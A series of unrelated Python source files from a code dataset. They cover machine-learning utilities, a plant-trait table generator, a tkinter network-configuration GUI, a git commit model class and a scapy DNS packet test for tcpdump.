managers.downgrade_11.DowngradeManager()\n\n def test_downgrade(self):\n self.iocm.insert(OPENIOC_11_ASSETS)\n self.iocm.convert_to_10()\n self.assertEqual(set(self.iocm.iocs_10.keys())-(self.iocm.pruned_11_iocs.union(self.iocm.null_pruned_iocs)),\n {'c158ef8c-e664-43c5-b71d-3488a3325fcb'})\n self.assertEqual(self.iocm.pruned_11_iocs, {'378f0cce-b8df-41d5-8189-3d7ec102e52f'})\n self.assertEqual(self.iocm.null_pruned_iocs, {'55075e99-273a-4b81-b92b-672be6666474'})\n expected_dict = {'378f0cce-b8df-41d5-8189-3d7ec102e52f': 1,\n '55075e99-273a-4b81-b92b-672be6666474': 0,\n 'c158ef8c-e664-43c5-b71d-3488a3325fcb': 2}\n for iocid, num_children in expected_dict.items():\n ioc_obj = self.iocm.iocs_10.get(iocid)\n self.assertEqual(len(ioc_obj.top_level_indicator.getchildren()), num_children)\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":17599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"623373681","text":"import numpy as np\nimport torch\nimport torch.nn.functional as F\n\n#### Loss Functions ####\n\ndef dice_loss(input, target):\n '''\n Input: two tensors of the same shape\n Returns: the soft dice score\n '''\n smooth = 1.\n\n iflat = input.view(-1)\n tflat = target.view(-1)\n intersection = (iflat * tflat).sum()\n \n return 1 - ((2. * intersection + smooth) /\n (iflat.sum() + tflat.sum() + smooth))\n\ndef dice_hard_loss(input, target):\n '''\n Input: two tensors of the same shape\n Returns: the hard dice score\n '''\n smooth = 0.001\n #iflat = input.view(-1)\n #tflat = target.view(-1)\n iflat = input\n tflat = target\n \n intersection = (iflat * tflat).sum()\n \n return ((2. * intersection + smooth) /(iflat.sum() + tflat.sum() + smooth))\n\n#### Triangular Learning Rate ####\n\ndef get_triangular_lr2(lr_low, lr_high, stepesize):\n '''\n Input:\n lr_low: The lowest learning rate to train at\n lr_high: The highest learning rate to train at\n stepesize: The ammount of steps to take\n Returns: the hard dice score\n '''\n iterations = 2*stepesize\n iter1 = int(0.35*iterations)\n iter2 = int(0.85*iter1)\n iter3 = iterations - iter1 - iter2\n delta1 = (lr_high - lr_low)/iter1\n delta2 = (lr_high - lr_low)/(iter1 -1)\n lrs1 = [lr_low + i*delta1 for i in range(iter1)]\n lrs2 = [lr_high - i*(delta1) for i in range(0, iter2)]\n delta2 = (lrs2[-1] - lr_low)/(iter3)\n lrs3 = [lrs2[-1] - i*(delta2) for i in range(1, iter3+1)]\n return lrs1+lrs2+lrs3\ndef train_triangular_policy(model, train_dl, valid_dl, lr_low=1e-5, lr_high=0.01):\n idx = 0\n epochs = 4\n stepesize = 2*len(train_dl)\n lrs = get_triangular_lr2(lr_low, lr_high, stepesize)\n for i in range(epochs):\n model.train()\n total = 0\n sum_loss = 0\n for i, (mod_input) in enumerate(train_dl):\n x,y = mod_input['x'],mod_input['y']\n\n optim = get_optimizer(model, lr = lrs[idx], wd =0)\n batch = y.shape[0]\n x = x.float()\n y = y.float()\n out = model(x)\n loss = F.binary_cross_entropy_with_logits(out, y)\n optim.zero_grad()\n loss.backward()\n optim.step()\n idx += 1\n total += batch\n sum_loss += batch*(loss.item())\n print(\"train loss\", sum_loss/total)\n train_loss=sum_loss/total\n val_loss = val_metrics(model, valid_dl)\n return train_loss,val_loss\n\n\n\ndef val_metrics(model, valid_dl):\n model.eval()\n total = 0\n sum_loss = 0\n correct = 0 \n for input in valid_dl:\n model.eval()\n\n x = input['x']\n y = input['y'].long()\n batch = y.shape[0]\n x = x.float()\n y = y.unsqueeze(1)\n out = model(x)\n pred = (out > 0.0).long()\n correct += pred.eq(y.data).sum().item()\n y = y.float().squeeze(1)\n loss = F.binary_cross_entropy_with_logits(out, y)\n sum_loss += batch*(loss.item())\n total += batch\n print(\"val loss and accuracy\", sum_loss/total, correct/total)\n return correct/total\n\n\n\n\ndef LR_range_finder(model, train_dl, lr_low=1e-5, lr_high=1, epochs=2):\n losses = []\n p = PATH/\"mode_tmp.pth\"\n save_model(model, str(p))\n iterations = epochs * len(train_dl)\n delta = (lr_high - lr_low)/iterations\n lrs = [lr_low + i*delta for i in range(iterations)]\n model.train()\n ind = 0\n \n for i in range(epochs):\n for sample in train_dl:\n x,y = sample['image'],sample['mask']\n\n optim = get_optimizer(model, lr=lrs[ind])\n x = x.cuda().float()\n y = y.cuda().float()\n out = model(x)\n loss = F.binary_cross_entropy_with_logits(out, y)\n optim.zero_grad()\n loss.backward()\n optim.step()\n losses.append(loss.item())\n ind +=1\n \n load_model(model, str(p))\n return lrs, losses\n\n\n\ndef get_optimizer(model, lr = 0.01, wd = 0.0):\n parameters = filter(lambda p: p.requires_grad, model.parameters())\n optim = torch.optim.Adam(parameters, lr=lr, weight_decay=wd)\n return optim\ndef save_model(m, p): torch.save(m.state_dict(), p)\n \ndef load_model(m, p): m.load_state_dict(torch.load(p))\nimport os, gzip, torch\nimport torch.nn as nn\nimport numpy as np\nimport scipy.misc\nimport imageio\nimport matplotlib.pyplot as plt\nfrom torchvision import datasets, transforms\n\ndef load_mnist(dataset):\n data_dir = os.path.join(\"./data\", dataset)\n\n def extract_data(filename, num_data, head_size, data_size):\n with gzip.open(filename) as bytestream:\n bytestream.read(head_size)\n buf = bytestream.read(data_size * num_data)\n data = np.frombuffer(buf, dtype=np.uint8).astype(np.float)\n return data\n\n data = extract_data(data_dir + '/train-images-idx3-ubyte.gz', 60000, 16, 28 * 28)\n trX = data.reshape((60000, 28, 28, 1))\n\n data = extract_data(data_dir + '/train-labels-idx1-ubyte.gz', 60000, 8, 1)\n trY = data.reshape((60000))\n\n data = extract_data(data_dir + '/t10k-images-idx3-ubyte.gz', 10000, 16, 28 * 28)\n teX = data.reshape((10000, 28, 28, 1))\n\n data = extract_data(data_dir + '/t10k-labels-idx1-ubyte.gz', 10000, 8, 1)\n teY = data.reshape((10000))\n\n trY = np.asarray(trY).astype(np.int)\n teY = np.asarray(teY)\n\n X = np.concatenate((trX, teX), axis=0)\n y = np.concatenate((trY, teY), axis=0).astype(np.int)\n\n seed = 547\n np.random.seed(seed)\n np.random.shuffle(X)\n np.random.seed(seed)\n np.random.shuffle(y)\n\n y_vec = np.zeros((len(y), 10), dtype=np.float)\n for i, label in enumerate(y):\n y_vec[i, y[i]] = 1\n\n X = X.transpose(0, 3, 1, 2) / 255.\n # y_vec = y_vec.transpose(0, 3, 1, 2)\n\n X = torch.from_numpy(X).type(torch.FloatTensor)\n y_vec = torch.from_numpy(y_vec).type(torch.FloatTensor)\n return X, y_vec\n\ndef load_celebA(dir, transform, batch_size, shuffle):\n # transform = transforms.Compose([\n # transforms.CenterCrop(160),\n # transform.Scale(64)\n # transforms.ToTensor(),\n # transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n # ])\n\n # data_dir = 'data/celebA' # this path depends on your computer\n dset = datasets.ImageFolder(dir, transform)\n data_loader = torch.utils.data.DataLoader(dset, batch_size, shuffle)\n\n return data_loader\n\n\ndef print_network(net):\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n print(net)\n print('Total number of parameters: %d' % num_params)\n\ndef save_images(images, size, image_path):\n return imsave(images, size, image_path)\n\ndef imsave(images, size, path):\n image = np.squeeze(merge(images, size))\n return scipy.misc.imsave(path, image)\n\ndef merge(images, size):\n h, w = images.shape[1], images.shape[2]\n if (images.shape[3] in (3,4)):\n c = images.shape[3]\n img = np.zeros((h * size[0], w * size[1], c))\n for idx, image in enumerate(images):\n i = idx % size[1]\n j = idx // size[1]\n img[j * h:j * h + h, i * w:i * w + w, :] = image\n return img\n elif images.shape[3]==1:\n img = np.zeros((h * size[0], w * size[1]))\n for idx, image in enumerate(images):\n i = idx % size[1]\n j = idx // size[1]\n img[j * h:j * h + h, i * w:i * w + w] = image[:,:,0]\n return img\n else:\n raise ValueError('in merge(images,size) images parameter ''must have dimensions: HxW or HxWx3 or HxWx4')\n\ndef generate_animation(path, num):\n images = []\n for e in range(num):\n img_name = path + '_epoch%03d' % (e+1) + '.png'\n images.append(imageio.imread(img_name))\n imageio.mimsave(path + '_generate_animation.gif', images, fps=5)\n\ndef loss_plot(hist, path = 'Train_hist.png', model_name = ''):\n x = range(len(hist['D_loss']))\n\n y1 = hist['D_loss']\n y2 = hist['G_loss']\n\n plt.plot(x, y1, label='D_loss')\n plt.plot(x, y2, label='G_loss')\n\n plt.xlabel('Iter')\n plt.ylabel('Loss')\n\n plt.legend(loc=4)\n plt.grid(True)\n plt.tight_layout()\n\n path = os.path.join(path, model_name + '_loss.png')\n\n plt.savefig(path)\n\n plt.close()\n\ndef initialize_weights(net):\n for m in net.modules():\n if isinstance(m, nn.Conv2d):\n m.weight.data.normal_(0, 0.02)\n m.bias.data.zero_()\n elif isinstance(m, nn.ConvTranspose2d):\n m.weight.data.normal_(0, 0.02)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(0, 0.02)\n m.bias.data.zero_()\n","sub_path":"Computer_Vision/UCSF_Code/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"290115225","text":"import os\nimport random as rd\nimport math\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nn = 10 # number of plant life strategies\n\ndef print_histogram(arr, b = 200, n=True):\n values = plt.hist(arr,bins=b, normed=n)\n plt.show()\n\n \ndef table_gen(N = n): \n # Random variables (beta distribution - normalized to min-max ranges of each variable)\n #g1 = np.linspace(1.6, 7.1, 10) # 10 elementos\n g1 = np.random.beta(1.4, 6.24, 10000) * (7.1 - 1.6/1.) + 1.6 # 10⁴ elementos\n #vcmax = np.linspace(3.e-5,25e-5,10) # 10 elementos\n vcmax = (np.random.beta(1.4, 6.24, 10000) * (25. - 3./1.) + 3) * 1e-5 # 10⁴ elementos\n #jmax = np.linspace(1e-4,3e-4,10) # 10 elementos\n jmax = (np.random.beta(1.4, 6.24, 10000) * (3. - 1./1.) + 1.) * 1e-4 # 10⁴ elementos\n \n #tleaf = np.arange(1,100,12)/12 # years 9 elementos\n tleaf = (np.random.beta(3, 6.24,10000) * (100. - 1./1.) + 1.) / 12 # 10⁴ elementos\n #twood = np.arange(1,80,5) # 16 elementos\n twood = np.random.beta(6, 6.24,10000) * (80. - 1./1.) + 1. # 10⁴ elementos\n #troot = np.arange(1,100,12)/12 #9 elementos\n troot = (np.random.beta(3, 6.24,10000) * (100. - 1./1.) + 1.) / 12 # 10⁴ elementos\n \n # constrained distributions (must sum up to 1.) \n aleaf = np.arange(20,81,1.25) #\n aroot = np.arange(20,81,1.25) # 13\n awood = np.arange(20,81,1.25) # 13\n colnames_a = ['aleaf','awood','aroot']\n plsa_grass = [[a/100,0.0,c/100] for a in aleaf for c in aroot if abs(a+0.0+c)==100.]\n plsa_wood = [[a/100,b/100,c/100] for a in aleaf for b in awood for c in aroot if ((a+b+c)==100.) and (b>19)]\n \n # CREATING ALLOCATION COMBINATIONS\n for i in range(len(plsa_grass)):\n x = plsa_grass.pop()\n if x in plsa_grass:\n pass\n else:\n plsa_grass.insert(0,x)\n \n for i in range(len(plsa_wood)):\n x = plsa_wood.pop()\n if x in plsa_wood:\n pass\n else:\n plsa_wood.insert(0,x)\n \n g2w_ratio = len(plsa_grass)/len(plsa_wood)\n\n\n\n if (len(plsa_wood) + len(plsa_grass)) < N:\n diffg = math.ceil(N * (g2w_ratio) - (len(plsa_grass)))\n diffw = N - diffg\n alloc_w = plsa_wood[:]\n alloc_g = plsa_grass[:]\n while len(alloc_w) <= diffw:\n alloc_w.append(plsa_wood[np.random.randint(0,len(plsa_wood))])\n while len(alloc_g) <= diffg:\n alloc_g.append(plsa_grass[np.random.randint(0,len(plsa_grass))])\n \n plsa_wood = alloc_w \n plsa_grass = alloc_g\n grassN = diffg\n woodN = diffw\n\n \n else:\n grassN = math.ceil(N * g2w_ratio)\n woodN = N - grassN\n\n grassN = int(grassN)\n woodN = int(woodN)\n\n plsa_wood = np.array(plsa_wood,np.float32)\n plsa_grass = np.array(plsa_grass,np.float32)\n np.random.shuffle(plsa_grass)\n np.random.shuffle(plsa_wood)\n\n\n alloc_wood = plsa_wood[np.random.randint(0,woodN-1,woodN)][:]\n alloc_grass = plsa_grass[np.random.randint(0,grassN-1,grassN)][:]\n alloc = list(np.vstack((alloc_grass, alloc_wood)))\n # COMBINATIONS\n # Random samples from beta distributions (g1, tleaf ...)\n # The sampling is done via indexation of beta distributions\n # with random integers from a discrete uniform distribution\n\n \n # ! ['g1','vcmax','tleaf','twood','troot','aleaf','awood','aroot']\n\n colnames = ['g1','vcmax','tleaf','twood','troot'] + colnames_a\n tau_leaf = list(tleaf[np.random.randint(0,9999,N)][:])\n tau_root = list(troot[np.random.randint(0,9999,N)][:])\n tau_wood = list(twood[np.random.randint(0,9999,N)][:])\n g1_pls = list(g1[np.random.randint(0,9999,N)][:])\n vcmax_pls = list(vcmax[np.random.randint(0,9999,N)][:])\n jmax_pls = list(jmax[np.random.randint(0,9999,N)][:])\n zero = np.zeros(1)\n pls_table = []\n for i in range(len(alloc)):\n if i < grassN:\n aux_arr = np.array([g1_pls[i],vcmax_pls[i],tau_leaf[i],list(zero)[0],tau_root[i]])\n pls = np.hstack((aux_arr,alloc[i]))\n else:\n aux_arr = np.array([g1_pls[i],vcmax_pls[i],tau_leaf[i],tau_wood[i],tau_root[i]])\n pls = np.hstack((aux_arr,alloc[i]))\n\n pls_table.append(pls)\n \n #pls_table = np.array(pls_table,np.float32)\n\n\n with open('pls_attrs.csv', mode='w') as fh:\n writer = csv.writer(fh, delimiter=',')\n writer.writerow(colnames)\n writer.writerows(pls_table)\n \n out_arr = np.array(pls_table,np.float32).T\n np.savetxt('pls.txt', out_arr, fmt='%.12f')\n \n\n","sub_path":"CAETE/src_5backup/plsgen.py","file_name":"plsgen.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"611086596","text":"import pyglet\n\nwindow = pyglet.window.Window()\nimage = pyglet.resource.image('pyglet.png')\n\n@window.event\ndef on_draw(): # The only event handle so far.\n window.clear()\n image.blit(100, 100)\n\npyglet.app.run() # always need the run","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"123500973","text":"# Copyright 2018 Davide Spadini\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom _datetime import datetime\nfrom typing import List\nfrom pydriller.domain.developer import Developer\nfrom pydriller.domain.modification import Modification, ModificationType\n\n\nclass Commit:\n def __init__(self, hash: str, author: Developer, committer: Developer,\n author_date: datetime, committer_date: datetime,\n author_timezone: int, committer_timezone: int,\n msg: str, parents: List[str], merge: bool = False, branches: set = set(),\n is_commit_in_main_branch: bool = False) -> None:\n \"\"\"\n Create a commit object.\n\n :param str hash: hash of the commit\n :param Developer author: author of the commit\n :param Developer committer: committer of the commit\n :param datetime author_date: date when the author committed\n :param datetime committer_date: date when the committer committed\n :param int author_timezone: seconds west from UTC\n :param int committer_timezone: seconds west from UTC\n :param str msg: message of the commit\n :param List[str] parents: list of hashes of the parent commits\n :param bool merge: True if the commit is a merge commit\n :param set branches: branches that include the commit\n :param bool is_commit_in_main_branch: True if the commit is in the main branch\n \"\"\"\n self.hash = hash\n self.author = author\n self.committer = committer\n self.author_date = author_date\n self.committer_date = committer_date\n self.author_timezone = author_timezone\n self.committer_timezone = committer_timezone\n self.msg = msg\n self.parents = parents\n self.merge = merge\n self.modifications = [] # type: List[Modification]\n self.branches = branches\n self.in_main_branch = is_commit_in_main_branch\n\n def add_modifications(self, old_path: str, new_path: str, change: ModificationType, diff: str, sc: str):\n \"\"\"\n Add a modification to the commit.\n\n :param str old_path: old path of the file (can be null if the file is added)\n :param str new_path: new path of the file (can be null if the file is deleted)\n :param ModificationType change: type of the change\n :param str diff: diff of the change\n :param str sc: source code of the file (can be null if the file is deleted)\n \"\"\"\n m = Modification(old_path, new_path, change, diff, sc)\n self.modifications.append(m)\n\n def __eq__(self, other):\n if not isinstance(other, Commit):\n return NotImplemented\n elif self is other:\n return True\n else:\n return self.__dict__ == other.__dict__\n\n def __str__(self):\n return ('Hash: {}'.format(self.hash) + '\\n'\n 'Author: {}'.format(self.author.name) + '\\n'\n 'Author email: {}'.format(self.author.email) + '\\n'\n 'Committer: {}'.format(self.committer.name) + '\\n'\n 'Committer email: {}'.format(self.committer.email) + '\\n'\n 'Author date: {}'.format(self.author_date.strftime(\"%Y-%m-%d %H:%M:%S\")) + '\\n'\n 'Committer date: {}'.format(self.committer_date.strftime(\"%Y-%m-%d %H:%M:%S\")) + '\\n'\n 'Message: {}'.format(self.msg) + '\\n'\n 'Parent: {}'.format(\"\\n\".join(map(str, self.parents))) + '\\n'\n 'Merge: {}'.format(self.merge) + '\\n'\n 'Modifications: \\n{}'.format(\"\\n\".join(map(str, self.modifications))) + '\\n'\n 'Branches: \\n{}'.format(\"\\n\".join(map(str, self.branches))) + '\\n'\n 'In main branch: {}'.format(self.in_main_branch)\n )\n\n\nclass ChangeSet:\n def __init__(self, id: str, date: datetime):\n \"\"\"\n Light-weight version of the commit, storing only the hash and the date. Used for filter out\n commits before asking for more complex information (like diff and source code).\n\n :param str id: hash of the commit\n :param date: date of the commit\n \"\"\"\n self.id = id\n self.date = date\n\n def __eq__(self, other):\n if not isinstance(other, ChangeSet):\n return NotImplemented\n elif self is other:\n return True\n else:\n return self.__dict__ == other.__dict__","sub_path":"pydriller/domain/commit.py","file_name":"commit.py","file_ext":"py","file_size_in_byte":4923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"103020520","text":"import tkinter as tk\n\nclass MainMenu(tk.Tk):\n def __init__(self):\n super().__init__()\n\n self.title(\"PyConfig v.0.1\")\n self.geometry(\"400x400\")\n\n # Label on top and bottom\n self.header_label = tk.Label(self, text=\"--- Config Application ---\", bg=\"lightgrey\", fg=\"black\", pady=10)\n self.header_label.pack(side=tk.TOP, fill=tk.X)\n\n self.footer_label = tk.Label(self, text=\"Author: Sebastian Röhl, Version: 0.1\", fg=\"black\", pady=10)\n self.footer_label.pack(side=tk.BOTTOM, fill=tk.X)\n\n # Buttons\n self.create_new_button = tk.Button(self, text=\"Create New\", pady=10, padx=10, command=self.open_create_window)\n self.create_new_button.pack(side=tk.TOP,fill=tk.X)\n\n self.load_existing_button = tk.Button(self, text=\"Load Existing\", pady=10, padx=10)\n self.load_existing_button.pack(side=tk.TOP, fill=tk.X)\n\n self.exit_button = tk.Button(self, text=\"Quit\", pady=10, padx=10, command=self.quit)\n self.exit_button.pack(side=tk.TOP, fill=tk.X)\n\n def open_create_window(self):\n CreateNewWindow(self)\n\n\nclass CreateNewWindow(tk.Toplevel):\n def __init__(self, master):\n super().__init__()\n\n self.master = master\n\n self.title(\"PyConfig v.0.1\")\n self.geometry(\"800x600\")\n\n # Sections displayed in the left frame\n self.sections = [\"General\", \"Router\", \"Interfaces\", \"VLANS\"]\n\n # Creating the menu and binding the shortcuts\n self.menubar = tk.Menu(self, bg=\"lightgrey\", fg=\"black\")\n\n self.file_menu = tk.Menu(self.menubar, tearoff=0, bg=\"lightgray\", fg=\"black\")\n self.file_menu.add_command(label=\"Open\", command=self.file_open, accelerator=\"Ctrl+O\")\n self.file_menu.add_command(label=\"Save\", command=self.file_save, accelerator=\"Ctrl+S\")\n self.file_menu.add_command(label=\"Export\", command=self.file_export, accelerator=\"Ctrl+E\")\n\n self.menubar.add_cascade(label=\"File\", menu=self.file_menu)\n self.config(menu=self.menubar)\n\n self.bind(\"\", self.file_open)\n self.bind(\"\", self.file_save)\n self.bind(\"\", self.file_export)\n\n # Left frame for showing the different configuration sections\n self.left_frame = tk.Frame(self, width=200, height=600, bg=\"grey\")\n self.left_frame.pack_propagate(0)\n\n self.section_select = tk.Listbox(self.left_frame, width=200, height=600, selectmode=tk.SINGLE, bg=\"grey\", fg=\"white\")\n self.section_select.configure(exportselection=False)\n self.section_select.pack(expand=1)\n for index, item in enumerate(self.sections):\n self.section_select.insert(index, item)\n self.section_select.bind(\"<>\", self.display_section_content)\n\n # Right frame for showing the specific configuration details\n self.right_frame = tk.Frame(self, width=600, height=600, bg=\"lightgrey\", padx=20, pady=20)\n self.right_frame.pack_propagate(0)\n\n # Pack the two frames\n self.left_frame.pack(side=tk.LEFT, fill=tk.BOTH)\n self.right_frame.pack(side=tk.LEFT, expand=1, fill=tk.BOTH)\n\n def file_open(self, event=None):\n print(\"Open File\")\n\n def file_save(self, event=None):\n print(\"Save File\")\n\n def file_export(self, event=None):\n print(\"Export File\")\n\n # Change content of the right frame when clicking different sections\n def display_section_content(self, event=None):\n selected_element = self.section_select.get(self.section_select.curselection())\n self.clear_right_frame()\n if selected_element == \"General\":\n self.render_general_frame()\n elif selected_element == \"Router\":\n self.render_router_frame()\n elif selected_element == \"Interfaces\":\n self.render_interfaces_frame()\n elif selected_element == \"VLANS\":\n self.render_vlans_frame()\n\n # Clear the right frame before changing the selection\n def clear_right_frame(self):\n for child in self.right_frame.winfo_children():\n child.destroy()\n\n def render_general_frame(self):\n print(\"render general\")\n\n # Host Name\n hostname_label = tk.Label(self.right_frame, text=\"Host Name:\", font=(None, 10), bg=\"black\", fg=\"white\")\n hostname_label.pack(fill=tk.X, side=tk.TOP, pady=(10,0))\n hostname_entry = tk.Entry(self.right_frame, bg=\"white\", fg=\"black\", justify=\"center\")\n hostname_entry.pack(fill=tk.X, side=tk.TOP, pady=(10,0))\n\n # IP Adress\n ipadress_label = tk.Label(self.right_frame, text=\"IP Adress:\", font=(None, 10), bg=\"black\", fg=\"white\")\n ipadress_label.pack(fill=tk.X, side=tk.TOP, pady=(10, 0))\n ipadress_entry = tk.Entry(self.right_frame, bg=\"white\", fg=\"black\", justify=\"center\")\n ipadress_entry.pack(fill=tk.X, side=tk.TOP, pady=(10, 0))\n\n # Subnet Mask\n subnet_label = tk.Label(self.right_frame, text=\"Subnet Mask:\", font=(None, 10), bg=\"black\", fg=\"white\")\n subnet_label.pack(fill=tk.X, side=tk.TOP, pady=(10, 0))\n subnet_entry = tk.Entry(self.right_frame, bg=\"white\", fg=\"black\", justify=\"center\")\n subnet_entry.pack(fill=tk.X, side=tk.TOP, pady=(10, 0))\n\n # Default Gateway\n default_gateway_label = tk.Label(self.right_frame, text=\"Default Gateway:\", font=(None, 10), bg=\"black\", fg=\"white\")\n default_gateway_label.pack(fill=tk.X, side=tk.TOP, pady=(10, 0))\n default_gateway_entry = tk.Entry(self.right_frame, bg=\"white\", fg=\"black\", justify=\"center\")\n default_gateway_entry.pack(fill=tk.X, side=tk.TOP, pady=(10, 0))\n # Admin VLAN?\n\n save_button = tk.Button(self.right_frame, text=\"Save Changes\", command=self.file_save)\n save_button.pack(side=tk.BOTTOM, pady=(0, 20))\n\n def render_router_frame(self):\n print(\"render router\")\n\n # Switch Type\n # Catalog Number\n # Description\n # EthernetPorts\n # GigabitPorts\n\n save_button = tk.Button(self.right_frame, text=\"Save Changes\", command=self.file_save)\n save_button.pack(side=tk.BOTTOM, pady=(0, 20))\n\n def render_interfaces_frame(self):\n print(\"render interfaces\")\n\n # Port\n # Interface\n # Access VLAN\n\n save_button = tk.Button(self.right_frame, text=\"Save Changes\", command=self.file_save)\n save_button.pack(side=tk.BOTTOM, pady=(0, 20))\n\n def render_vlans_frame(self):\n print(\"render vlan\")\n\n # VLAN\n # ID\n # Name\n # IP Adress\n # Subnet Mask\n\n save_button = tk.Button(self.right_frame, text=\"Save Changes\", command=self.file_save)\n save_button.pack(side=tk.BOTTOM, pady=(0, 20))\n\n\nif __name__ == \"__main__\":\n mainMenu = MainMenu()\n mainMenu.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"132452669","text":"import keras\nimport numpy as np\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras.optimizers import SGD, RMSprop, Adam\nfrom keras.regularizers import l2\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.callbacks import ModelCheckpoint, Callback \n\nstr_index = 'ABCDEFGH'\n\ntest_data_dir = 'test'\nnb_test_samples = 10\nnb_classes = 8\n\nimg_width, img_height = 28, 28\n\nmodel = Sequential()\nmodel.add(Convolution2D(32, 5, 5, input_shape=(img_width, img_height, 1)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Convolution2D(64, 5, 5))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\nmodel.add(Dense(1024))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(nb_classes, W_regularizer=l2(0.01)))\nmodel.add(Activation('softmax'))\n\nmodel.load_weights('best.h5')\n\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\ntest_generator = test_datagen.flow_from_directory(\n test_data_dir,\n target_size=(img_width, img_height),\n batch_size=1,\n shuffle=False,\n color_mode='grayscale',\n class_mode=None)\n\noutput_arr = model.predict_generator(test_generator, nb_test_samples)\n\nf = open('LetterCNN[12300120012].txt', 'w') \nf.truncate()\n\nfor output in output_arr:\n\tmax_index = np.argmax(output)\n\tf.write(str_index[max_index] + '\\n')\n\nf.close()","sub_path":"test_cnn.py","file_name":"test_cnn.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"124431937","text":"from pyadh import *\nfrom pyadh.default_n import *\nfrom curvature_sloshbox_2d_p import *\nfrom sloshbox import *\n\ntimeIntegration = NoIntegration\n#timeIntegration = PsiTCtte\ntimeIntegrator = SteadyStateIntegrator\n#DT = None\n\nfemSpaces = {0:C0_AffineLinearOnSimplexWithNodalBasis}\n#femSpaces = {0:DG_AffineP0_OnSimplexWithMonomialBasis}\n\nelementQuadrature = SimplexGaussQuadrature(nd,sloshbox_quad_order)\n\nelementBoundaryQuadrature = SimplexGaussQuadrature(nd-1,sloshbox_quad_order)\n\n#elementQuadrature = SimplexLobattoQuadrature(nd,1)\n#\n#elementBoundaryQuadrature = SimplexLobattoQuadrature(nd-1,1)\n\nsubgridError = None\nshockCapturing = None\nmassLumping = False\nreactionLumping=False\nnumericalFluxType = None\n#numericalFluxType = Advection_Diagonal_average\n#numericalFluxType = Advection_DiagonalUpwind_Diffusion_IIPG_exterior\nnumericalFluxType = Curvature_exterior\nmultilevelNonlinearSolver = Newton\nfullNewtonFlag = False\ntolFac = 0.0\natol = 0.001*he#1.0e-8 #1e-4\nmaxNonlinearIts = 100\nmatrix = SparseMatrix\nmultilevelLinearSolver = LU\nlevelLinearSolver = LU\nif usePETSc:\n multilevelLinearSolver = PETSc\n levelLinearSolver = PETSc\n nLayersOfOverlapForParallel = 2\n parallelPartitioningType = MeshParallelPartitioningTypes.node\n #parallelPartitioningType = MeshParallelPartitioningTypes.element\n\nlinTolFac = 0.001\nconservativeFlux = None\n","sub_path":"curvature_sloshbox_2d_c0p1_n.py","file_name":"curvature_sloshbox_2d_c0p1_n.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"301803835","text":"from __future__ import unicode_literals\nfrom django import forms\n\nfrom symposion.speakers.models import Speaker\n\n\nclass SpeakerForm(forms.ModelForm):\n required_css_class = \"formfield-required\"\n\n class Meta:\n model = Speaker\n fields = [\n \"name\",\n \"biography\",\n \"photo\",\n \"github_username\",\n \"twitter_username\",\n ]\n\n def clean_twitter_username(self):\n value = self.cleaned_data[\"twitter_username\"]\n if value.startswith(\"@\"):\n value = value[1:]\n return value\n","sub_path":"symposion/speakers/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"176815800","text":"#!/usr/bin/env python\n\nimport sys\nfrom scapy.all import *\nimport helper\nimport logging\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR)\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.WARNING)\n\n\ndef main():\n\n udp_packet = IP() / UDP(dport=53) / DNS(qd=DNSQR(qname=\"google.com\"))\n udp_re_output = \"\"\n udp_retcode = helper.chck(udp_packet, udp_re_output)\n\n tcp_packet = TCP(dport=53)\n tcp_re_output = \"\"\n tcp_retcode = helper.chck(tcp_packet, tcp_re_output)\n\n if tcp_retcode and udp_retcode:\n sys.exit(0)\n else:\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n\n main()\n","sub_path":"tests/regress/tcpdump/proto_domain.py","file_name":"proto_domain.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"133943360","text":"# 